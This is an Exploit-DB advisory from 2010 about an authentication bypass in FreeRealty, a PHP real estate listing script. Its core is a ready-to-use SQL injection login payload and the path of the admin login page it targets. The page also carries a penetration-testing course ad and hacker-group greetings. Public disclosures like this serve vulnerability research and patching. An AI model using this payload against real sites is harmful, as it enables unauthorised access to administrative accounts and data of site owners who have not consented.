FreeRealty(Free Real Estate Listing Software) - Authentication Bypass

EDB-ID:

12411




Platform:

PHP

Date:

2010-04-27


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Authentication bypass in FreeRealty(Free Real Estate Listing Software)
# Date: 27-apr-2010
# Author: Sid3^effects
# Software Link: N/a
# CVE : []
# Code : []                   ______________________________________________________________________________                               Authentication bypass in FreeRealty
                       Vendor:http://freerealty.rwcinc.net/
      ___________________________Author:Sid3^effects_________________________________
  

Description :

 Free Realty  is primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end user does not need to be fluent in web page design.
 

script cost :Free
---------------------------------------------------------------------------
	* Authentication bypass:

	The following script has authentication bypass.

	use ' or 1=1 or ''=' in both login and password.

DEMO :http://[site]/demo/agentadmin.php


ShoutZ :
------- 
               ---Indian Cyber warriors--Andhra hackers-- 

Greetz :
--------
 ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--